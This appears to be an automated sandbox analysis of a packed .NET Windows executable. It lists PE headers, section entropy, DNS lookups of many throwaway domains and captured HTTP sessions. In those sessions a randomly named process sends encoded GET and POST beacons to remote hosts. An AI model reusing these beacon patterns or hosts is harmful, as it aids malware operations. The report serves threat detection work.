                                                                              Subsystem Version Minor:0
                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                              Instruction
                                                                              jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xdc6c8 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xde000 | 0x59f4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xe4000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xda7a0 | 0xda800 | a4ee16f8d4a5354ebf43954f0d064572 | False | 0.9290070348255148 | data | 7.844873716049532 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xde000 | 0x59f4 | 0x5a00 | df99a1408cff00c9dd11148f731c7bb0 | False | 0.9312065972222222 | data | 7.85816581647925 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xe4000 | 0xc | 0x200 | 235bbaff56821669be47b8fd778194ad | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xde100 | 0x531a | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.968083106138949
RT_GROUP_ICON | 0xe342c | 0x14 | data | | | 1.05
RT_VERSION | 0xe3450 | 0x3a4 | data | | | 0.4366952789699571
RT_MANIFEST | 0xe3804 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                              Dec 2, 2024 14:44:18.467788935 CET8049916103.224.182.242192.168.2.10
                                                                              Dec 2, 2024 14:44:18.467842102 CET8049916103.224.182.242192.168.2.10
                                                                              Dec 2, 2024 14:44:18.467856884 CET8049916103.224.182.242192.168.2.10
                                                                              Dec 2, 2024 14:44:18.468077898 CET4991680192.168.2.10103.224.182.242
                                                                              Dec 2, 2024 14:44:18.470793962 CET4991680192.168.2.10103.224.182.242
                                                                              Dec 2, 2024 14:44:18.590739012 CET8049916103.224.182.242192.168.2.10
                                                                              Dec 2, 2024 14:44:24.018384933 CET4993280192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:24.138380051 CET8049932172.67.158.106192.168.2.10
                                                                              Dec 2, 2024 14:44:24.141968012 CET4993280192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:24.162108898 CET4993280192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:24.282464027 CET8049932172.67.158.106192.168.2.10
                                                                              Dec 2, 2024 14:44:25.368513107 CET8049932172.67.158.106192.168.2.10
                                                                              Dec 2, 2024 14:44:25.369875908 CET8049932172.67.158.106192.168.2.10
                                                                              Dec 2, 2024 14:44:25.369931936 CET4993280192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:25.663434029 CET4993280192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:26.682125092 CET4993980192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:26.802165985 CET8049939172.67.158.106192.168.2.10
                                                                              Dec 2, 2024 14:44:26.802371025 CET4993980192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:26.817049026 CET4993980192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:26.937175035 CET8049939172.67.158.106192.168.2.10
                                                                              Dec 2, 2024 14:44:27.994410992 CET8049939172.67.158.106192.168.2.10
                                                                              Dec 2, 2024 14:44:27.994764090 CET8049939172.67.158.106192.168.2.10
                                                                              Dec 2, 2024 14:44:27.994997978 CET4993980192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:28.319655895 CET4993980192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:29.338359118 CET4994580192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:29.458712101 CET8049945172.67.158.106192.168.2.10
                                                                              Dec 2, 2024 14:44:29.458792925 CET4994580192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:29.473859072 CET4994580192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:29.594417095 CET8049945172.67.158.106192.168.2.10
                                                                              Dec 2, 2024 14:44:29.594434977 CET8049945172.67.158.106192.168.2.10
                                                                              Dec 2, 2024 14:44:30.642689943 CET8049945172.67.158.106192.168.2.10
                                                                              Dec 2, 2024 14:44:30.642822981 CET8049945172.67.158.106192.168.2.10
                                                                              Dec 2, 2024 14:44:30.642872095 CET4994580192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:30.976620913 CET4994580192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:31.999120951 CET4995280192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:32.119117975 CET8049952172.67.158.106192.168.2.10
                                                                              Dec 2, 2024 14:44:32.119195938 CET4995280192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:32.132716894 CET4995280192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:32.252712965 CET8049952172.67.158.106192.168.2.10
                                                                              Dec 2, 2024 14:44:33.346755981 CET8049952172.67.158.106192.168.2.10
                                                                              Dec 2, 2024 14:44:33.346962929 CET8049952172.67.158.106192.168.2.10
                                                                              Dec 2, 2024 14:44:33.347187996 CET4995280192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:33.347840071 CET8049952172.67.158.106192.168.2.10
                                                                              Dec 2, 2024 14:44:33.348000050 CET4995280192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:33.350131989 CET4995280192.168.2.10172.67.158.106
                                                                              Dec 2, 2024 14:44:33.470124960 CET8049952172.67.158.106192.168.2.10
                                                                              Dec 2, 2024 14:44:38.861920118 CET4996780192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:38.981995106 CET80499673.33.130.190192.168.2.10
                                                                              Dec 2, 2024 14:44:38.989960909 CET4996780192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:39.001931906 CET4996780192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:39.122040987 CET80499673.33.130.190192.168.2.10
                                                                              Dec 2, 2024 14:44:40.141227007 CET80499673.33.130.190192.168.2.10
                                                                              Dec 2, 2024 14:44:40.141288042 CET4996780192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:40.507205963 CET4996780192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:40.627222061 CET80499673.33.130.190192.168.2.10
                                                                              Dec 2, 2024 14:44:41.526300907 CET4997480192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:41.646354914 CET80499743.33.130.190192.168.2.10
                                                                              Dec 2, 2024 14:44:41.650702000 CET4997480192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:41.690571070 CET4997480192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:41.810870886 CET80499743.33.130.190192.168.2.10
                                                                              Dec 2, 2024 14:44:42.747303963 CET80499743.33.130.190192.168.2.10
                                                                              Dec 2, 2024 14:44:42.747396946 CET4997480192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:43.194890022 CET4997480192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:43.315633059 CET80499743.33.130.190192.168.2.10
                                                                              Dec 2, 2024 14:44:44.214683056 CET4998180192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:44.334726095 CET80499813.33.130.190192.168.2.10
                                                                              Dec 2, 2024 14:44:44.334814072 CET4998180192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:44.355114937 CET4998180192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:44.475373983 CET80499813.33.130.190192.168.2.10
                                                                              Dec 2, 2024 14:44:44.475441933 CET80499813.33.130.190192.168.2.10
                                                                              Dec 2, 2024 14:44:45.523804903 CET80499813.33.130.190192.168.2.10
                                                                              Dec 2, 2024 14:44:45.524384975 CET4998180192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:45.866584063 CET4998180192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:45.988030910 CET80499813.33.130.190192.168.2.10
                                                                              Dec 2, 2024 14:44:46.885293007 CET4998880192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:47.005316019 CET80499883.33.130.190192.168.2.10
                                                                              Dec 2, 2024 14:44:47.005578041 CET4998880192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:47.015214920 CET4998880192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:47.135993004 CET80499883.33.130.190192.168.2.10
                                                                              Dec 2, 2024 14:44:48.194793940 CET80499883.33.130.190192.168.2.10
                                                                              Dec 2, 2024 14:44:48.194895983 CET80499883.33.130.190192.168.2.10
                                                                              Dec 2, 2024 14:44:48.194947004 CET4998880192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:48.199589968 CET4998880192.168.2.103.33.130.190
                                                                              Dec 2, 2024 14:44:48.319596052 CET80499883.33.130.190192.168.2.10
                                                                              Dec 2, 2024 14:44:53.737984896 CET4999480192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:44:53.858251095 CET8049994161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:44:53.858349085 CET4999480192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:44:53.878459930 CET4999480192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:44:53.998632908 CET8049994161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:44:55.102485895 CET8049994161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:44:55.102509975 CET8049994161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:44:55.102580070 CET8049994161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:44:55.102750063 CET4999480192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:44:55.382371902 CET4999480192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:44:56.401866913 CET4999580192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:44:56.522125006 CET8049995161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:44:56.522341967 CET4999580192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:44:56.539814949 CET4999580192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:44:56.660017014 CET8049995161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:44:57.858855009 CET8049995161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:44:57.858875036 CET8049995161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:44:57.858887911 CET8049995161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:44:57.858920097 CET4999580192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:44:57.858968973 CET4999580192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:44:58.054140091 CET4999580192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:44:59.077414036 CET4999680192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:44:59.198229074 CET8049996161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:44:59.202054977 CET4999680192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:44:59.225997925 CET4999680192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:44:59.346199989 CET8049996161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:44:59.346354008 CET8049996161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:45:00.539998055 CET8049996161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:45:00.540040970 CET8049996161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:45:00.540054083 CET8049996161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:45:00.540112019 CET4999680192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:45:00.726115942 CET4999680192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:45:01.748755932 CET4999780192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:45:01.869040966 CET8049997161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:45:01.869122028 CET4999780192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:45:01.880819082 CET4999780192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:45:02.001020908 CET8049997161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:45:03.208888054 CET8049997161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:45:03.208905935 CET8049997161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:45:03.208923101 CET8049997161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:45:03.208930969 CET8049997161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:45:03.209063053 CET4999780192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:45:03.209136009 CET4999780192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:45:03.216101885 CET4999780192.168.2.10161.97.142.144
                                                                              Dec 2, 2024 14:45:03.336087942 CET8049997161.97.142.144192.168.2.10
                                                                              Dec 2, 2024 14:45:09.581465006 CET4999880192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:09.701464891 CET804999835.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:09.701575994 CET4999880192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:09.718020916 CET4999880192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:09.838088989 CET804999835.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:11.207480907 CET804999835.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:11.207511902 CET804999835.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:11.209543943 CET4999880192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:11.226481915 CET4999880192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:12.245404959 CET4999980192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:12.365552902 CET804999935.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:12.365653992 CET4999980192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:12.383399963 CET4999980192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:12.503518105 CET804999935.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:13.897929907 CET4999980192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:13.911417961 CET804999935.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:13.911468983 CET804999935.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:13.911484003 CET4999980192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:13.911524057 CET4999980192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:14.018205881 CET804999935.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:14.018270016 CET4999980192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:14.916771889 CET5000080192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:15.036895037 CET805000035.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:15.037005901 CET5000080192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:15.053141117 CET5000080192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:15.173166990 CET805000035.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:15.173191071 CET805000035.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:16.554229021 CET5000080192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:16.625010967 CET805000035.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:16.625045061 CET805000035.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:16.625082016 CET5000080192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:16.625118017 CET5000080192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:16.674319983 CET805000035.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:16.674372911 CET5000080192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:17.574012041 CET5000180192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:17.694070101 CET805000135.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:17.694232941 CET5000180192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:17.706048965 CET5000180192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:17.826211929 CET805000135.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:19.282972097 CET805000135.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:19.283031940 CET805000135.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:19.283193111 CET5000180192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:19.286654949 CET5000180192.168.2.1035.220.176.144
                                                                              Dec 2, 2024 14:45:19.406872034 CET805000135.220.176.144192.168.2.10
                                                                              Dec 2, 2024 14:45:25.500086069 CET5000280192.168.2.10101.35.209.183
                                                                              Dec 2, 2024 14:45:25.620229959 CET8050002101.35.209.183192.168.2.10
                                                                              Dec 2, 2024 14:45:25.620552063 CET5000280192.168.2.10101.35.209.183
                                                                              Dec 2, 2024 14:45:25.636650085 CET5000280192.168.2.10101.35.209.183
                                                                              Dec 2, 2024 14:45:25.756755114 CET8050002101.35.209.183192.168.2.10
                                                                              Dec 2, 2024 14:45:27.150043011 CET5000280192.168.2.10101.35.209.183
                                                                              Dec 2, 2024 14:45:27.169576883 CET8050002101.35.209.183192.168.2.10
                                                                              Dec 2, 2024 14:45:27.169658899 CET8050002101.35.209.183192.168.2.10
                                                                              Dec 2, 2024 14:45:27.169708967 CET5000280192.168.2.10101.35.209.183
                                                                              Dec 2, 2024 14:45:27.169779062 CET5000280192.168.2.10101.35.209.183
                                                                              Dec 2, 2024 14:45:27.270083904 CET8050002101.35.209.183192.168.2.10
                                                                              Dec 2, 2024 14:45:27.270176888 CET5000280192.168.2.10101.35.209.183
                                                                              Dec 2, 2024 14:45:28.166590929 CET5000380192.168.2.10101.35.209.183
                                                                              Dec 2, 2024 14:45:28.287024975 CET8050003101.35.209.183192.168.2.10
                                                                              Dec 2, 2024 14:45:28.287139893 CET5000380192.168.2.10101.35.209.183
                                                                              Dec 2, 2024 14:45:28.304949045 CET5000380192.168.2.10101.35.209.183
                                                                              Dec 2, 2024 14:45:28.425354958 CET8050003101.35.209.183192.168.2.10
                                                                              Dec 2, 2024 14:45:29.819935083 CET5000380192.168.2.10101.35.209.183
                                                                              Dec 2, 2024 14:45:29.927292109 CET8050003101.35.209.183192.168.2.10
Timestamp  Source Port  Dest Port  Source IP  Dest IP
Timestamp  Source IP  Dest IP  Trans ID  OP Code  Name  Type  Class  DNS over HTTPS
                                                                              Dec 2, 2024 14:46:09.874152899 CET192.168.2.101.1.1.10xba4cStandard query (0)www.dietcoffee.onlineA (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:46:24.779453039 CET192.168.2.101.1.1.10xb0ccStandard query (0)www.smartcongress.netA (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:46:25.774192095 CET192.168.2.101.1.1.10xb0ccStandard query (0)www.smartcongress.netA (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:46:40.495682001 CET192.168.2.101.1.1.10xeedcStandard query (0)www.alihones.lolA (IP address)IN (0x0001)false
                                                                              Dec 2, 2024 14:46:45.212408066 CET192.168.2.101.1.1.10x47c3Standard query (0)www.alihones.lolA (IP address)IN (0x0001)false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 2, 2024 14:43:35.030673981 CET | 1.1.1.1 | 192.168.2.10 | 0xa6e2 | No error (0) | www.cyperla.xyz | cyperla.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Dec 2, 2024 14:43:35.030673981 CET | 1.1.1.1 | 192.168.2.10 | 0xa6e2 | No error (0) | cyperla.xyz | | 31.186.11.114 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:43:53.355854034 CET | 1.1.1.1 | 192.168.2.10 | 0x8c47 | No error (0) | www.cstrategy.online | cstrategy.online | | CNAME (Canonical name) | IN (0x0001) | false
Dec 2, 2024 14:43:53.355854034 CET | 1.1.1.1 | 192.168.2.10 | 0x8c47 | No error (0) | cstrategy.online | | 194.76.119.60 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:43:53.355881929 CET | 1.1.1.1 | 192.168.2.10 | 0x8c47 | No error (0) | www.cstrategy.online | cstrategy.online | | CNAME (Canonical name) | IN (0x0001) | false
Dec 2, 2024 14:43:53.355881929 CET | 1.1.1.1 | 192.168.2.10 | 0x8c47 | No error (0) | cstrategy.online | | 194.76.119.60 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:44:09.077033997 CET | 1.1.1.1 | 192.168.2.10 | 0x68db | No error (0) | www.madhf.tech | | 103.224.182.242 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:44:09.082261086 CET | 1.1.1.1 | 192.168.2.10 | 0x68db | No error (0) | www.madhf.tech | | 103.224.182.242 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:44:24.015868902 CET | 1.1.1.1 | 192.168.2.10 | 0x430b | No error (0) | www.bser101pp.buzz | | 172.67.158.106 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:44:24.015868902 CET | 1.1.1.1 | 192.168.2.10 | 0x430b | No error (0) | www.bser101pp.buzz | | 104.21.58.90 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:44:38.854800940 CET | 1.1.1.1 | 192.168.2.10 | 0xa763 | No error (0) | www.goldstarfootwear.shop | goldstarfootwear.shop | | CNAME (Canonical name) | IN (0x0001) | false
Dec 2, 2024 14:44:38.854800940 CET | 1.1.1.1 | 192.168.2.10 | 0xa763 | No error (0) | goldstarfootwear.shop | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:44:38.854800940 CET | 1.1.1.1 | 192.168.2.10 | 0xa763 | No error (0) | goldstarfootwear.shop | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:44:53.730803013 CET | 1.1.1.1 | 192.168.2.10 | 0x6086 | No error (0) | www.070002018.xyz | | 161.97.142.144 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:45:09.571687937 CET | 1.1.1.1 | 192.168.2.10 | 0xb67c | No error (0) | www.bienmaigrir.info | | 35.220.176.144 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:45:09.571702957 CET | 1.1.1.1 | 192.168.2.10 | 0xb67c | No error (0) | www.bienmaigrir.info | | 35.220.176.144 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:45:25.497694969 CET | 1.1.1.1 | 192.168.2.10 | 0xa16b | No error (0) | www.yc791022.asia | | 101.35.209.183 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:45:25.497718096 CET | 1.1.1.1 | 192.168.2.10 | 0xa16b | No error (0) | www.yc791022.asia | | 101.35.209.183 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:45:40.713469982 CET | 1.1.1.1 | 192.168.2.10 | 0x1aee | No error (0) | www.jalan2.online | jalan2.online | | CNAME (Canonical name) | IN (0x0001) | false
Dec 2, 2024 14:45:40.713469982 CET | 1.1.1.1 | 192.168.2.10 | 0x1aee | No error (0) | jalan2.online | | 108.181.189.7 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:45:55.411051989 CET | 1.1.1.1 | 192.168.2.10 | 0xefe6 | No error (0) | www.beyondfitness.live | | 209.74.77.107 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:46:10.383847952 CET | 1.1.1.1 | 192.168.2.10 | 0xba4c | No error (0) | www.dietcoffee.online | | 77.68.64.45 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:46:26.008670092 CET | 1.1.1.1 | 192.168.2.10 | 0xb0cc | No error (0) | www.smartcongress.net | smartcongress.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 2, 2024 14:46:26.008670092 CET | 1.1.1.1 | 192.168.2.10 | 0xb0cc | No error (0) | smartcongress.net | | 146.88.233.115 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:46:26.008697987 CET | 1.1.1.1 | 192.168.2.10 | 0xb0cc | No error (0) | www.smartcongress.net | smartcongress.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 2, 2024 14:46:26.008697987 CET | 1.1.1.1 | 192.168.2.10 | 0xb0cc | No error (0) | smartcongress.net | | 146.88.233.115 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:46:40.802912951 CET | 1.1.1.1 | 192.168.2.10 | 0xeedc | Name error (3) | www.alihones.lol | none | none | A (IP address) | IN (0x0001) | false
Dec 2, 2024 14:46:45.350652933 CET | 1.1.1.1 | 192.168.2.10 | 0x47c3 | Name error (3) | www.alihones.lol | none | none | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49820 | 31.186.11.114 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 14:43:35.167638063 CET | 354 | OUT | GET /qygv/?_jVx=rlV0_TQ81&6NVpdLF=PNgLNtFNavTWVACj/R5fAEIERpwPFUn3Y2lvnmQ+PypmeASZv9aNxFxhHJqyS8bM8Pjr3wsa5/scE4diKg4WgueYbl0NkgEkN4ghVwMkIOvivrFpog== HTTP/1.1
                                                                              Host: www.cyperla.xyz
                                                                              Accept: */*
                                                                              Accept-Language: en-us
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
Dec 2, 2024 14:43:36.637901068 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                              Connection: close
                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                              pragma: no-cache
                                                                              content-type: text/html
                                                                              content-length: 1251
                                                                              date: Mon, 02 Dec 2024 13:43:36 GMT
                                                                              server: LiteSpeed
                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Dec 2, 2024 14:43:36.637945890 CET | 253 | IN | Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49860 | 194.76.119.60 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 14:43:53.496704102 CET | 628 | OUT | POST /qx5d/ HTTP/1.1
                                                                              Host: www.cstrategy.online
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.cstrategy.online
                                                                              Content-Length: 196
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.cstrategy.online/qx5d/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
